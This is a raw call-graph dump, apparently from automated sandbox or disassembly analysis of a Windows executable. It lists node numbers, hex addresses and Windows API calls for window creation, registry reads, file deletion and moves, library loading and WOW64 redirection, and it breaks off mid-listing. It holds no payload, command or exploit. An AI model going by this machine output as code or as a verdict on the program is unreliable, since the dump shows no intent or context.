API calls 54334->54336 54384 466b84 54335->54384 54398 466040 54335->54398 54340 466e78 54336->54340 54342 403634 4 API calls 54337->54342 54343 4669f3 54338->54343 54346 403400 4 API calls 54340->54346 54341 466c0c 54344 403400 4 API calls 54341->54344 54342->54335 54347 414a58 4 API calls 54343->54347 54348 466c0a 54344->54348 54345 466ac0 54349 466ac6 54345->54349 54350 466afe 54345->54350 54351 466e80 54346->54351 54352 466a07 54347->54352 54404 46647c 42 API calls 54348->54404 54353 403494 4 API calls 54349->54353 54355 403400 4 API calls 54350->54355 54354 403420 4 API calls 54351->54354 54352->54315 54360 414a58 4 API calls 54352->54360 54356 466ad4 54353->54356 54357 466e8d 54354->54357 54359 466afc 54355->54359 54363 47742c 42 API calls 54356->54363 54357->54080 54358 466bcb 54364 403494 4 API calls 54358->54364 54371 466334 42 API calls 54359->54371 54361 466a2e 54360->54361 54365 403634 4 API calls 54361->54365 54367 466aec 54363->54367 54368 466bd9 54364->54368 54365->54315 54366 466c35 54374 466c96 54366->54374 54375 466c40 54366->54375 54369 403634 4 API calls 54367->54369 54370 414a58 4 API calls 54368->54370 54369->54359 54372 466bfa 54370->54372 54373 466b25 54371->54373 54376 403634 4 API calls 54372->54376 54379 466b86 54373->54379 54380 466b30 54373->54380 54377 403400 4 API calls 54374->54377 54378 403494 4 API calls 54375->54378 54376->54348 54381 466c9e 54377->54381 54387 466c4e 54378->54387 54383 403400 4 API calls 54379->54383 54382 403494 4 API calls 54380->54382 54385 466c94 54381->54385 54396 466d47 54381->54396 54389 466b3e 54382->54389 54383->54384 54384->54341 54384->54358 54385->54381 54405 48f418 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54385->54405 54387->54381 54387->54385 54390 403634 4 API calls 54387->54390 54388 466cc1 54388->54396 54406 48f680 18 API calls 54388->54406 54389->54384 54392 403634 4 API calls 54389->54392 54390->54387 54392->54389 54394 466de8 54408 4290b4 SendMessageA SendMessageA 54394->54408 54407 429064 SendMessageA 54396->54407 54397->54082 54411 429fb0 SendMessageA 54398->54411 54400 46604f 54401 46606f 54400->54401 54412 429fb0 SendMessageA 54400->54412 54401->54345 54403 46605f 54403->54345 54404->54366 54405->54388 54406->54396 54407->54394 54408->54313 54409->54334 54410->54334 54411->54400 54412->54403 54414 478b6e 54413->54414 54418 478ba4 54413->54418 54448 4546f8 54414->54448 54415 403420 4 API calls 54416 478ca5 54415->54416 54416->54087 54418->54415 54419 478c6e 54419->54087 54420 474a30 19 API calls 54423 478b98 54420->54423 54421 47742c 42 API calls 54421->54423 54422 47742c 42 API calls 54426 478c1c 54422->54426 54423->54418 54423->54419 54423->54420 54423->54421 54423->54426 54455 478700 31 API calls 54423->54455 54425 42c808 5 API calls 54425->54426 54426->54422 54426->54423 54426->54425 54427 42c830 5 API calls 54426->54427 54429 478c5b 54426->54429 54456 47884c 54 API calls 54426->54456 54427->54426 54429->54418 54430->54094 54432 42ef40 54431->54432 54433 42ef63 GetActiveWindow GetFocus 54432->54433 54434 41ee14 2 API calls 54433->54434 54435 42ef7a 54434->54435 54436 42ef97 54435->54436 54437 42ef87 RegisterClassA 54435->54437 54438 42f026 SetFocus 54436->54438 54439 42efa5 CreateWindowExA 54436->54439 54437->54436 54441 403400 4 API calls 54438->54441 54439->54438 54440 42efd8 54439->54440 54474 4241ec 54440->54474 54443 42f042 54441->54443 54447 48f680 18 API calls 54443->54447 54444 42f000 54445 42f008 CreateWindowExA 54444->54445 54445->54438 54446 42f01e ShowWindow 54445->54446 54446->54438 54447->54112 54449 454709 54448->54449 54450 454716 54449->54450 54451 45470d 54449->54451 54465 4544dc 29 API calls 54450->54465 54457 4543fc 54451->54457 54454 454713 54454->54423 54455->54423 54456->54426 54458 42dc54 RegOpenKeyExA 54457->54458 54459 454419 54458->54459 54460 454467 54459->54460 54466 454330 54459->54466 54460->54454 54463 454330 6 API calls 54464 454448 RegCloseKey 54463->54464 54464->54454 54465->54454 54471 42db90 54466->54471 54468 403420 4 API calls 54469 4543e2 54468->54469 54469->54463 54470 454358 54470->54468 54472 42da38 6 API calls 54471->54472 54473 42db99 54472->54473 54473->54470 54475 42421e 54474->54475 54476 4241fe GetWindowTextA 54474->54476 54478 403494 4 API calls 54475->54478 54477 4034e0 4 API calls 54476->54477 54479 42421c 54477->54479 54478->54479 54479->54444 54481 468681 54480->54481 54482 414a58 4 API calls 54481->54482 54492 4686ce 54481->54492 54484 468697 54482->54484 54483 403420 4 API calls 54486 468778 54483->54486 54661 463188 6 API calls 54484->54661 54486->54132 54654 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54486->54654 54487 46869f 54488 414a88 4 API calls 54487->54488 54489 4686ad 54488->54489 54490 4686ba 54489->54490 54493 4686d3 54489->54493 54662 479aec 37 API calls 54490->54662 54492->54483 54494 4686eb 54493->54494 54496 46326c CharNextA 54493->54496 54663 479aec 37 API calls 54494->54663 54497 4686e7 54496->54497 54497->54494 54498 468701 54497->54498 54499 468707 54498->54499 54500 46871d 54498->54500 54664 479aec 37 API calls 54499->54664 54502 42c878 CharNextA 54500->54502 54503 46872a 54502->54503 54503->54492 54665 4632f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54503->54665 54505 468741 54506 450b64 4 API calls 54505->54506 54507 46874e 54506->54507 54666 479aec 37 API calls 54507->54666 54510 47cfe9 54509->54510 54511 47cfbb 54509->54511 54513 471744 54510->54513 54667 48f434 18 API calls 54511->54667 54514 455f80 24 API calls 54513->54514 54515 471790 54514->54515 54516 407210 SetCurrentDirectoryA 54515->54516 54517 47179a 54516->54517 54668 46a1c4 54517->54668 54519 47179f 54675 458854 54519->54675 54522 47742c 42 API calls 54523 4717f6 54522->54523 54525 471806 54523->54525 55072 451f4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54523->55072 54526 471828 54525->54526 55073 451f4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54525->55073 54528 47426c 20 API calls 54526->54528 54529 471833 54528->54529 54530 403450 4 API calls 54529->54530 54531 471850 54530->54531 54532 403450 4 API calls 54531->54532 54533 47185e 54532->54533 54679 46a88c 54533->54679 54537 4718c4 54719 47169c 54537->54719 54544 46a414 17 API calls 54545 4718e8 54544->54545 54735 470924 54545->54735 54655->54140 54661->54487 54662->54492 54663->54492 54664->54492 54665->54505 54666->54492 54667->54510 54674 46a1eb 54668->54674 54669 46a268 55080 44f490 54669->55080 54670 474a30 19 API calls 54670->54674 54673 46a2c2 54673->54519 54674->54669 54674->54670 54676 45885a 54675->54676 54677 458b3c 4 API calls 54676->54677 54678 458876 54677->54678 54678->54522 54680 46a8ca 54679->54680 54681 46a8ba 54679->54681 54683 403400 4 API calls 54680->54683 54682 403494 4 API calls 54681->54682 54684 46a8c8 54682->54684 54683->54684 54685 453f4c 5 API calls 54684->54685 54686 46a8de 54685->54686 54687 453f88 5 API calls 54686->54687 54688 46a8ec 54687->54688 54689 46a864 5 API calls 54688->54689 54690 46a900 54689->54690 54691 458910 4 API calls 54690->54691 54692 46a918 54691->54692 54693 403420 4 API calls 54692->54693 54694 46a932 54693->54694 54695 403400 4 API calls 54694->54695 54696 46a93a 54695->54696 54697 46aa98 54696->54697 54698 4034e0 4 API calls 54697->54698 54699 46aad5 54698->54699 54700 46aade 54699->54700 54701 46aaed 54699->54701 54702 47742c 42 API calls 54700->54702 54703 403400 4 API calls 54701->54703 54704 46aaeb 54702->54704 54703->54704 54705 47742c 42 API calls 54704->54705 54706 46ab10 54705->54706 54707 46ab3d 54706->54707 55092 46a94c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54706->55092 55089 46aa84 54707->55089 54711 47742c 42 API calls 54712 46ab7e 54711->54712 54713 458910 4 API calls 54712->54713 54714 46ab9c 54713->54714 54715 403420 4 API calls 54714->54715 54716 46abb6 54715->54716 54717 403420 4 API calls 54716->54717 54718 46abc3 54717->54718 54718->54537 54720 4716ac 54719->54720 54722 4716dd 54719->54722 54721 4748f0 19 API calls 54720->54721 54720->54722 54721->54720 54723 46a414 54722->54723 54724 46a422 54723->54724 54725 46a41d 54723->54725 55093 42441c 54724->55093 55097 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54725->55097 54729 46a43a 54731 4716f0 54729->54731 54732 471700 54731->54732 54734 471733 54731->54734 54733 4748f0 19 API calls 54732->54733 54732->54734 54733->54732 54734->54544 55072->54525 55073->54526 55083 44f4a4 55080->55083 55084 44f4b5 55083->55084 55085 44f4d6 MulDiv 55084->55085 55086 44f4a1 76CCE550 55084->55086 55087 418150 55085->55087 55086->54673 55088 44f501 SendMessageA 55087->55088 55088->55086 55090 403494 4 API calls 55089->55090 55091 46aa93 55090->55091 55091->54711 55092->54707 55094 42441f 55093->55094 55096 42442a 55094->55096 55099 42436c PeekMessageA 55094->55099 55096->54729 55098 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 55096->55098 55100 424410 55099->55100 55101 42438f 55099->55101 55100->55094 55101->55100 55111 42433c 55101->55111 55112 424364 55111->55112 55113 42434d 55111->55113 55112->55100 55115 424288 55112->55115 55113->55112 55130 424c28 UnhookWindowsHookEx TerminateThread KillTimer IsWindowVisible ShowWindow 55113->55130 55116 4242d2 55115->55116 55117 424298 55115->55117 55116->55100 55117->55116 55130->55112 56105 47b534 56106 450710 5 API calls 56105->56106 56107 47b548 56106->56107 56108 47a678 23 API calls 56107->56108 56109 47b56c 56108->56109 56110 416ab2 56111 416b5a 56110->56111 56112 416aca 56110->56112 56129 41528c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56111->56129 56113 416ae4 SendMessageA 56112->56113 56114 416ad8 56112->56114 56125 416b38 56113->56125 56116 416ae2 CallWindowProcA 56114->56116 56117 416afe 56114->56117 56116->56125 56126 419fc8 GetSysColor 56117->56126 56120 416b09 SetTextColor 56121 416b1e 56120->56121 56127 419fc8 GetSysColor 56121->56127 56123 416b23 SetBkColor 56128 41a650 GetSysColor CreateBrushIndirect 56123->56128 56126->56120 56127->56123 56128->56125 56129->56125 51221 48c0dc 51222 48c116 51221->51222 51223 48c118 51222->51223 51224 48c122 51222->51224 51421 409000 MessageBeep 51223->51421 51226 48c15a 51224->51226 51227 48c131 51224->51227 51234 48c169 51226->51234 51235 48c192 51226->51235 51228 446a2c 18 API calls 51227->51228 51230 48c13e 51228->51230 51229 403420 4 API calls 51231 48c76e 51229->51231 51233 406b18 4 API calls 51230->51233 51232 403400 4 API calls 51231->51232 51236 48c776 51232->51236 51237 48c149 51233->51237 51238 446a2c 18 API calls 51234->51238 51241 48c1ca 51235->51241 51242 48c1a1 51235->51242 51422 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51237->51422 51240 48c176 51238->51240 51423 406b68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51240->51423 51249 48c1d9 51241->51249 51250 48c1f2 51241->51250 51244 446a2c 18 API calls 51242->51244 51246 48c1ae 51244->51246 51245 48c181 51424 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51245->51424 51425 406b9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51246->51425 51427 4071e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 51249->51427 51256 48c201 51250->51256 51257 48c226 51250->51257 51251 48c1b9 51426 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51251->51426 51254 48c1e1 51428 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51254->51428 51258 446a2c 18 API calls 51256->51258 51261 48c25e 51257->51261 51262 48c235 51257->51262 51259 48c20e 51258->51259 51429 407210 51259->51429 51268 48c26d 51261->51268 51269 48c296 51261->51269 51263 446a2c 18 API calls 51262->51263 51265 48c242 51263->51265 51264 48c216 51432 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51264->51432 51267 42c6e0 5 API calls 51265->51267 51270 48c24d 51267->51270 51271 446a2c 18 API calls 51268->51271 51274 48c2e2 51269->51274 51275 48c2a5 51269->51275 51433 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51270->51433 51273 48c27a 51271->51273 51434 407160 8 API calls 51273->51434 51282 48c31a 51274->51282 51283 48c2f1 51274->51283 51277 446a2c 18 API calls 51275->51277 51279 48c2b4 51277->51279 51278 48c285 51435 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51278->51435 51281 446a2c 18 API calls 51279->51281 51285 48c2c5 51281->51285 51290 48c329 51282->51290 51291 48c352 51282->51291 51284 446a2c 18 API calls 51283->51284 51286 48c2fe 51284->51286 51436 48bde0 8 API calls 51285->51436 51438 42c780 51286->51438 51289 48c2d1 51437 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51289->51437 51294 446a2c 18 API calls 51290->51294 51297 48c361 51291->51297 51301 48c38a 51291->51301 51296 48c336 51294->51296 51299 42c7a8 5 API calls 51296->51299 51300 446a2c 18 API calls 51297->51300 51298 48c11d 51298->51229 51302 48c341 51299->51302 51303 48c36e 51300->51303 51306 48c399 51301->51306 51307 48c3c2 51301->51307 51444 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51302->51444 51445 42c7d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 51303->51445 51309 446a2c 18 API calls 51306->51309 51313 48c3fa 51307->51313 51314 48c3d1 51307->51314 51308 48c379 51446 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51308->51446 51311 48c3a6 51309->51311 51312 42c808 5 API calls 51311->51312 51315 48c3b1 51312->51315 51319 48c409 51313->51319 51320 48c446 51313->51320 51316 446a2c 18 API calls 51314->51316 51447 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51315->51447 51318 48c3de 51316->51318 51321 42c830 5 API calls 51318->51321 51322 446a2c 18 API calls 51319->51322 51327 48c498 51320->51327 51328 48c455 51320->51328 51323 48c3e9 51321->51323 51324 48c418 51322->51324 51448 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51323->51448 51326 446a2c 18 API calls 51324->51326 51329 48c429 51326->51329 51335 48c50b 51327->51335 51336 48c4a7 51327->51336 51330 446a2c 18 API calls 51328->51330 51449 42c424 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 51329->51449 51332 48c468 51330->51332 51333 446a2c 18 API calls 51332->51333 51337 48c479 51333->51337 51334 48c435 51450 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51334->51450 51343 48c54a 51335->51343 51344 48c51a 51335->51344 51409 446a2c 51336->51409 51451 48bfd8 12 API calls 51337->51451 51342 48c487 51452 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51342->51452 51352 48c589 51343->51352 51353 48c559 51343->51353 51347 446a2c 18 API calls 51344->51347 51349 48c527 51347->51349 51348 48c4c2 51350 48c4fb 51348->51350 51351 48c4c6 51348->51351 51455 451510 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 51349->51455 51454 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51350->51454 51356 446a2c 18 API calls 51351->51356 51366 48c5c8 51352->51366 51367 48c598 51352->51367 51358 446a2c 18 API calls 51353->51358 51357 48c4d5 51356->51357 51414 451888 51357->51414 51362 48c566 51358->51362 51359 48c534 51456 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51359->51456 51457 451378 51362->51457 51363 48c545 51363->51298 51364 48c4e5 51453 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51364->51453 51374 48c610 51366->51374 51375 48c5d7 51366->51375 51368 446a2c 18 API calls 51367->51368 51371 48c5a5 51368->51371 51370 48c573 51464 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51370->51464 51465 451a18 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 51371->51465 51380 48c658 51374->51380 51381 48c61f 51374->51381 51377 446a2c 18 API calls 51375->51377 51376 48c5b2 51466 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51376->51466 51379 48c5e6 51377->51379 51382 446a2c 18 API calls 51379->51382 51386 48c66b 51380->51386 51393 48c721 51380->51393 51383 446a2c 18 API calls 51381->51383 51384 48c5f7 51382->51384 51385 48c62e 51383->51385 51467 446cac 51384->51467 51387 446a2c 18 API calls 51385->51387 51389 446a2c 18 API calls 51386->51389 51390 48c63f 51387->51390 51391 48c698 51389->51391 51396 446cac 5 API calls 51390->51396 51392 446a2c 18 API calls 51391->51392 51394 48c6af 51392->51394 51393->51298 51476 4469d0 18 API calls 51393->51476 51473 407d44 7 API calls 51394->51473 51396->51298 51397 48c73a 51398 42e670 5 API calls 51397->51398 51399 48c742 51398->51399 51477 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51399->51477 51402 48c6d1 51403 446a2c 18 API calls 51402->51403 51404 48c6e5 51403->51404 51474 408470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51404->51474 51406 48c6f0 51475 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51406->51475 51408 48c6fc 51410 446a34 51409->51410 51478 435aac 51410->51478 51412 446a53 51413 42c528 7 API calls 51412->51413 51413->51348 51415 45132c 2 API calls 51414->51415 51417 4518a1 51415->51417 51416 4518a5 51416->51364 51417->51416 51418 4518c9 MoveFileA GetLastError 51417->51418 51419 451368 Wow64RevertWow64FsRedirection 51418->51419 51420 4518ef 51419->51420 51420->51364 51421->51298 51422->51298 51423->51245 51424->51298 51425->51251 51426->51298 51427->51254 51428->51298 51430 403738 51429->51430 51431 40721a SetCurrentDirectoryA 51430->51431 51431->51264 51432->51298 51433->51298 51434->51278 51435->51298 51436->51289 51437->51298 51439 42c678 IsDBCSLeadByte 51438->51439 51440 42c790 51439->51440 51441 403778 4 API calls 51440->51441 51442 42c7a1 51441->51442 51443 446d80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51442->51443 51443->51298 51444->51298 51445->51308 51446->51298 51447->51298 51448->51298 51449->51334 51450->51298 51451->51342 51452->51298 51453->51298 51454->51298 51455->51359 51456->51363 51458 45132c 2 API calls 51457->51458 51459 45138e 51458->51459 51460 451392 51459->51460 51461 4513b0 CreateDirectoryA GetLastError 51459->51461 51460->51370 51462 451368 Wow64RevertWow64FsRedirection 51461->51462 51463 4513d6 51462->51463 51463->51370 51464->51298 51465->51376 51466->51298 51468 446cb4 51467->51468 51501 435e14 VariantClear 51468->51501 51470 446cd7 51471 446cee 51470->51471 51502 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51470->51502 51471->51298 51473->51402 51474->51406 51475->51408 51476->51397 51477->51298 51479 435ab8 51478->51479 51480 435ada 51478->51480 51479->51480 51498 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51479->51498 51481 435b5d 51480->51481 51483 435b21 51480->51483 51484 435b51 51480->51484 51485 435b45 51480->51485 51486 435b2d 51480->51486 51497 435b39 51480->51497 51500 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51481->51500 51490 403510 4 API calls 51483->51490 51499 4040e8 18 API calls 51484->51499 51488 403494 4 API calls 51485->51488 51491 403510 4 API calls 51486->51491 51492 435b4e 51488->51492 51494 435b2a 51490->51494 51496 435b36 51491->51496 51492->51412 51493 435b5a 51493->51412 51494->51412 51495 435b6e 51495->51412 51496->51412 51497->51412 51498->51480 51499->51493 51500->51495 51501->51470 51502->51471 51503 40cd94 51506 406e78 WriteFile 51503->51506 51507 406e95 51506->51507 56130 4165b4 56131 4165c1 56130->56131 56132 41661b 56130->56132 56137 4164c0 CreateWindowExA 56131->56137 56133 4165c8 SetPropA SetPropA 56133->56132 56134 4165fb 56133->56134 56135 41660e SetWindowPos 56134->56135 56135->56132 56137->56133 51508 422254 51509 422263 51508->51509 51514 4211e4 51509->51514 51512 422283 51515 421253 51514->51515 51517 4211f3 51514->51517 51520 421264 51515->51520 51539 412440 GetMenuItemCount GetMenuStringA GetMenuState 51515->51539 51517->51515 51538 408c94 19 API calls 51517->51538 51518 42132a 51525 42133e SetMenu 51518->51525 51535 421303 51518->51535 51519 421292 51524 421305 51519->51524 51529 4212ad 51519->51529 51520->51518 51520->51519 51521 421356 51542 42112c 10 API calls 51521->51542 51527 421319 51524->51527 51524->51535 51525->51535 51526 42135d 51526->51512 51537 422158 10 API calls 51526->51537 51530 421322 SetMenu 51527->51530 51531 4212d0 GetMenu 51529->51531 51529->51535 51530->51535 51532 4212f3 51531->51532 51533 4212da 51531->51533 51540 412440 GetMenuItemCount GetMenuStringA GetMenuState 51532->51540 51536 4212ed SetMenu 51533->51536 51535->51521 51541 421d9c 11 API calls 51535->51541 51536->51532 51537->51512 51538->51517 51539->51520 51540->51535 51541->51521 51542->51526 56138 42eef4 56139 42ef03 NtdllDefWindowProc_A 56138->56139 56140 42eeff 56138->56140 56139->56140 51543 435314 51544 435329 51543->51544 51548 435343 51544->51548 51549 434cfc 51544->51549 51555 434d46 51549->51555 51559 434d2c 51549->51559 51550 403400 4 API calls 51551 43514b 51550->51551 51551->51548 51562 43515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51551->51562 51552 4467d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51552->51559 51553 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51553->51559 51554 402648 4 API calls 51554->51559 51555->51550 51556 4316d4 4 API calls 51556->51559 51558 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51558->51559 51559->51552 51559->51553 51559->51554 51559->51555 51559->51556 51559->51558 51560 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51559->51560 51563 433de4 51559->51563 51575 4345a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51559->51575 51560->51559 51562->51548 51564 433ea1 51563->51564 51565 433e11 51563->51565 51594 433d44 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51564->51594 51566 403494 4 API calls 51565->51566 51569 433e1f 51566->51569 51568 433e93 51570 403400 4 API calls 51568->51570 51571 403778 4 API calls 51569->51571 51572 433ef1 51570->51572 51573 433e40 51571->51573 51572->51559 51573->51568 51576 48f0cc 51573->51576 51575->51559 51577 48f19c 51576->51577 51578 48f104 51576->51578 51595 448364 51577->51595 51579 403494 4 API calls 51578->51579 51584 48f10f 51579->51584 51581 48f11f 51582 403400 4 API calls 51581->51582 51583 48f1c0 51582->51583 51585 403400 4 API calls 51583->51585 51584->51581 51586 4037b8 4 API calls 51584->51586 51587 48f1c8 51585->51587 51588 48f138 51586->51588 51587->51573 51588->51581 51589 4037b8 4 API calls 51588->51589 51590 48f15b 51589->51590 51591 403778 4 API calls 51590->51591 51592 48f18c 51591->51592 51593 403634 4 API calls 51592->51593 51593->51577 51594->51568 51596 448389 51595->51596 51606 4483cc 51595->51606 51597 403494 4 API calls 51596->51597 51598 448394 51597->51598 51603 4037b8 4 API calls 51598->51603 51599 4483e0 51601 403400 4 API calls 51599->51601 51602 448413 51601->51602 51602->51581 51604 4483b0 51603->51604 51605 4037b8 4 API calls 51604->51605 51605->51606 51606->51599 51607 447f60 51606->51607 51608 403494 4 API calls 51607->51608 51609 447f96 51608->51609 51610 4037b8 4 API calls 51609->51610 51611 447fa8 51610->51611 51612 403778 4 API calls 51611->51612 51613 447fc9 51612->51613 51614 4037b8 4 API calls 51613->51614 51615 447fe1 51614->51615 51616 403778 4 API calls 51615->51616 51617 44800c 51616->51617 51618 4037b8 4 API calls 51617->51618 51619 448024 51618->51619 51620 4480f7 51619->51620 51623 44807f LoadLibraryExA 51619->51623 51624 448091 LoadLibraryA 51619->51624 51627 44805c 51619->51627 51628 403b80 4 API calls 51619->51628 51629 403450 4 API calls 51619->51629 51631 43d4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51619->51631 51625 4480ff GetProcAddress 51620->51625 51621 403420 4 API calls 51622 44813c 51621->51622 51622->51599 51623->51619 51624->51619 51626 448112 51625->51626 51626->51627 51627->51621 51628->51619 51629->51619 51631->51619 51632 44815c 51633 448191 51632->51633 51634 44818a 51632->51634 51635 4481a5 51633->51635 51636 447f60 7 API calls 51633->51636 51638 403400 4 API calls 51634->51638 51635->51634 51637 403494 4 API calls 51635->51637 51636->51635 51639 4481be 51637->51639 51640 44833b 51638->51640 51641 4037b8 4 API calls 51639->51641 51642 4481da 51641->51642 51643 4037b8 4 API calls 51642->51643 51644 4481f6 51643->51644 51644->51634 51645 44820a 51644->51645 51646 4037b8 4 API calls 51645->51646 51647 448224 51646->51647 51648 431604 4 API calls 51647->51648 51649 448246 51648->51649 51650 4316d4 4 API calls 51649->51650 51657 448266 51649->51657 51650->51649 51651 4482bc 51664 441d68 51651->51664 51654 4482a4 51654->51651 51676 443004 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51654->51676 51656 4482f0 GetLastError 51677 447ef4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51656->51677 51657->51654 51675 443004 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51657->51675 51659 4482ff 51678 443044 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51659->51678 51661 448314 51679 443054 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51661->51679 51663 44831c 51665 442d46 51664->51665 51666 441da1 51664->51666 51668 403400 4 API calls 51665->51668 51667 403400 4 API calls 51666->51667 51669 441da9 51667->51669 51670 442d5b 51668->51670 51671 431604 4 API calls 51669->51671 51670->51656 51672 441db5 51671->51672 51673 442d36 51672->51673 51680 441440 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51672->51680 51673->51656 51675->51657 51676->51651 51677->51659 51678->51661 51679->51663 51680->51672 51681 44aedc 51682 44aeea 51681->51682 51684 44af09 51681->51684 51682->51684 51685 44adc0 51682->51685 51686 44adf3 51685->51686 51696 414a58 51686->51696 51688 44ae06 51689 40357c 4 API calls 51688->51689 51690 44ae33 73A0A570 51688->51690 51689->51690 51700 41a158 51690->51700 51693 44ae64 51708 44aaf4 51693->51708 51695 44ae78 73A0A480 51695->51684 51697 414a66 51696->51697 51698 4034e0 4 API calls 51697->51698 51699 414a73 51698->51699 51699->51688 51701 41a183 51700->51701 51702 41a21f 51700->51702 51705 403520 4 API calls 51701->51705 51703 403400 4 API calls 51702->51703 51704 41a237 SelectObject 51703->51704 51704->51693 51706 41a1db 51705->51706 51707 41a213 CreateFontIndirectA 51706->51707 51707->51702 51709 44ab0b 51708->51709 51710 44ab9e 51709->51710 51711 44ab87 51709->51711 51712 44ab1e 51709->51712 51710->51695 51713 44ab97 DrawTextA 51711->51713 51712->51710 51714 402648 4 API calls 51712->51714 51713->51710 51715 44ab2f 51714->51715 51716 44ab4d MultiByteToWideChar DrawTextW 51715->51716 51717 402660 4 API calls 51716->51717 51718 44ab7f 51717->51718 51718->51695 51719 4931d0 51775 403344 51719->51775 51721 4931de 51778 4056a0 51721->51778 51723 4931e3 51781 4098b4 51723->51781 51727 4931ed 51791 4108c4 51727->51791 51729 4931f2 51795 412898 51729->51795 51731 4931fc 51800 418fb0 GetVersion 51731->51800 52042 4032fc 51775->52042 51777 403349 GetModuleHandleA GetCommandLineA 51777->51721 51780 4056db 51778->51780 52043 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51778->52043 51780->51723 52044 408f8c 51781->52044 51790 409ae8 6F571CD0 51790->51727 51792 4108ce 51791->51792 51793 41090d GetCurrentThreadId 51792->51793 51794 410928 51793->51794 51794->51729 52135 40ae6c 51795->52135 51799 4128c4 51799->51731 52147 41dd94 8 API calls 51800->52147 51802 418fc9 52149 418ea8 GetCurrentProcessId 51802->52149 52042->51777 52043->51780 52116 408c24 52044->52116 52047 408544 GetSystemDefaultLCID 52051 40857a 52047->52051 52048 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52048->52051 52049 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52049->52051 52050 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 52050->52051 52051->52048 52051->52049 52051->52050 52054 4085dc 52051->52054 52052 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52052->52054 52053 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 52053->52054 52054->52052 52054->52053 52055 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52054->52055 52056 40865f 52054->52056 52055->52054 52057 403420 4 API calls 52056->52057 52058 408679 52057->52058 52059 408688 GetSystemDefaultLCID 52058->52059 52127 4084d0 GetLocaleInfoA 52059->52127 52062 403450 4 API calls 52063 4086c8 52062->52063 52064 4084d0 5 API calls 52063->52064 52065 4086dd 52064->52065 52066 4084d0 5 API calls 52065->52066 52067 408701 52066->52067 52133 40851c GetLocaleInfoA 52067->52133 52070 40851c GetLocaleInfoA 52071 408731 52070->52071 52072 4084d0 5 API calls 52071->52072 52073 40874b 52072->52073 52074 40851c GetLocaleInfoA 52073->52074 52075 408768 52074->52075 52076 4084d0 5 API calls 52075->52076 52077 408782 52076->52077 52078 403450 4 API calls 52077->52078 52079 40878f 52078->52079 52080 4084d0 5 API calls 52079->52080 52081 4087a4 52080->52081 52082 403450 4 API calls 52081->52082 52083 4087b1 52082->52083 52084 40851c GetLocaleInfoA 52083->52084 52085 4087bf 52084->52085 52086 4084d0 5 API calls 52085->52086 52087 4087d9 52086->52087 52088 403450 4 API calls 52087->52088 52089 